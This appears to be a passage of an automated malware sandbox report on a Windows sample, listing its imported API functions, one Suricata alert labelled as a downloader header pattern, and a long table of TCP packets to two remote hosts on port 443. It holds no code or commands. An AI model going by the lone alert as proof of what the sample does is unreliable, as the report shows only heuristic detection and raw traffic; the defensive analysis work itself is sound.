                                                        USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                        SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                        ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                        COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                        ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                        Possible Origin

                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishUnited States

                                                        Network Behavior

                                                        Suricata IDS Alerts

                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-10-04T17:25:15.462505+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.11.2049775142.250.65.206443TCP

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Oct 4, 2024 17:25:14.951000929 CEST49775443192.168.11.20142.250.65.206
                                                        Oct 4, 2024 17:25:14.951108932 CEST44349775142.250.65.206192.168.11.20
                                                        Oct 4, 2024 17:25:14.951371908 CEST49775443192.168.11.20142.250.65.206
                                                        Oct 4, 2024 17:25:14.972904921 CEST49775443192.168.11.20142.250.65.206
                                                        Oct 4, 2024 17:25:14.972917080 CEST44349775142.250.65.206192.168.11.20
                                                        Oct 4, 2024 17:25:15.218158007 CEST44349775142.250.65.206192.168.11.20
                                                        Oct 4, 2024 17:25:15.218310118 CEST49775443192.168.11.20142.250.65.206
                                                        Oct 4, 2024 17:25:15.218310118 CEST49775443192.168.11.20142.250.65.206
                                                        Oct 4, 2024 17:25:15.219764948 CEST44349775142.250.65.206192.168.11.20
                                                        Oct 4, 2024 17:25:15.219997883 CEST49775443192.168.11.20142.250.65.206
                                                        Oct 4, 2024 17:25:15.255723953 CEST49775443192.168.11.20142.250.65.206
                                                        Oct 4, 2024 17:25:15.255795002 CEST44349775142.250.65.206192.168.11.20
                                                        Oct 4, 2024 17:25:15.256758928 CEST44349775142.250.65.206192.168.11.20
                                                        Oct 4, 2024 17:25:15.256927967 CEST49775443192.168.11.20142.250.65.206
                                                        Oct 4, 2024 17:25:15.258954048 CEST49775443192.168.11.20142.250.65.206
                                                        Oct 4, 2024 17:25:15.300318003 CEST44349775142.250.65.206192.168.11.20
                                                        Oct 4, 2024 17:25:15.462662935 CEST44349775142.250.65.206192.168.11.20
                                                        Oct 4, 2024 17:25:15.462881088 CEST49775443192.168.11.20142.250.65.206
                                                        Oct 4, 2024 17:25:15.462980986 CEST44349775142.250.65.206192.168.11.20
                                                        Oct 4, 2024 17:25:15.463084936 CEST44349775142.250.65.206192.168.11.20
                                                        Oct 4, 2024 17:25:15.463169098 CEST49775443192.168.11.20142.250.65.206
                                                        Oct 4, 2024 17:25:15.463279963 CEST49775443192.168.11.20142.250.65.206
                                                        Oct 4, 2024 17:25:15.464127064 CEST49775443192.168.11.20142.250.65.206
                                                        Oct 4, 2024 17:25:15.464234114 CEST44349775142.250.65.206192.168.11.20
                                                        Oct 4, 2024 17:25:15.611186028 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:15.611233950 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:15.611499071 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:15.611552954 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:15.611569881 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:15.869079113 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:15.869313002 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:15.873800039 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:15.873846054 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:15.874454021 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:15.874658108 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:15.874929905 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:15.916337967 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.355335951 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.355649948 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.355714083 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.370565891 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.370858908 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.370858908 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.387269974 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.387531996 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.387531996 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.387628078 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.387891054 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.387958050 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.388279915 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.465385914 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.465640068 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.465703964 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.465919971 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.469310045 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.469532013 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.469593048 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.469786882 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.477300882 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.477536917 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.477596998 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.477864027 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.485466003 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.485785961 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.485856056 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.486123085 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.493309021 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.493616104 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.493674040 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.493874073 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.501584053 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.501852989 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.501915932 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.502336979 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.509522915 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.509819984 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.509887934 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.510045052 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.517548084 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.517766953 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.517836094 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.518119097 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.525118113 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.525285006 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.525352955 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.525568008 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.532481909 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.532844067 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.532912016 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.533166885 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.539964914 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.540235043 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.540302038 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.540502071 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.547420025 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.547616959 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.547688007 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.547858953 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.554851055 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.555042982 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.558543921 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.558718920 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.558789015 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.559052944 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.559092999 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.559233904 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.575622082 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.575790882 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.575860023 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.576036930 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.578821898 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.578989029 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.579046965 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.579241037 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.585001945 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.585226059 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.585283041 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.585511923 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.590523958 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.590789080 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.590846062 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.591114044 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.596487045 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.596657038 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.596729040 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.596971989 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.601953030 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.602166891 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.602193117 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.602242947 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.602363110 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.607598066 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.607812881 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.607884884 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.608146906 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.613008022 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.613181114 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.613250017 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.613445997 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.618699074 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.618922949 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.618990898 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.619231939 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.624394894 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.624568939 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.624643087 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.624850035 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.629771948 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.629987001 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.630048037 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.630240917 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.635477066 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.635710001 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.638458967 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.638660908 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.638737917 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.639056921 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.644093990 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.644263983 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.644337893 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.644640923 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.649373055 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.649528980 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.649600029 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.649821997 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.655384064 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.655561924 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.655647039 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.655863047 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.660453081 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.660680056 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.660751104 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.660958052 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.665833950 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.666064024 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.666145086 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.666373968 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.670965910 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.671214104 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.671298027 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.671521902 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.675513029 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.675786972 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.675859928 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.676126003 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.680567980 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.680773973 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.680841923 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.681008101 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.685548067 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.685760975 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.685848951 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.686007023 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.690411091 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.690635920 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.690721989 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.690956116 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.695147038 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.695380926 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.695461988 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.695662975 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.698405027 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.698765039 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.699771881 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.700010061 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.700100899 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.700309992 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.702761889 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.703052998 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.703131914 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.703382969 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.705641031 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.705892086 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.705971956 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.706193924 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.708609104 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.708936930 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.709013939 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.709249020 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.711360931 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.711559057 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.711635113 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.711834908 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.714344978 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.714591026 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.714647055 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.714848042 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.717072010 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.717323065 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.717381001 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.717602015 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.720128059 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.720371008 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.720432997 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.720669985 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.723051071 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.723273993 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.723332882 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.723548889 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.725666046 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.725883961 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.725940943 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.726181030 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.728431940 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.728666067 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.728734016 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.728961945 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.731484890 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.731714010 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.731781006 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.731947899 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.734147072 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.734358072 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.735544920 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.735780954 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.735852003 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.736087084 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.738440990 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.738665104 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.738733053 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.738934994 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.740920067 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.741134882 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.741203070 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.741417885 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.743719101 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.743931055 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.744002104 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.744164944 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.746104002 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.746378899 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.746444941 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.746774912 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.748969078 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.749183893 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.749253035 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.749465942 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.751293898 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.751586914 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.751653910 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.751938105 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.753940105 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.754148960 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.754218102 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.754431009 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.756418943 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.756619930 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.756692886 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.756903887 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.758800030 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.759033918 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.759095907 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.759358883 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.761136055 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.761334896 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.761394024 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.761605978 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.763788939 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.764064074 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.764127970 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.764399052 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.766446114 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.766691923 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.767885923 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.768147945 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.768241882 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.768472910 CEST49776443192.168.11.20142.250.65.161
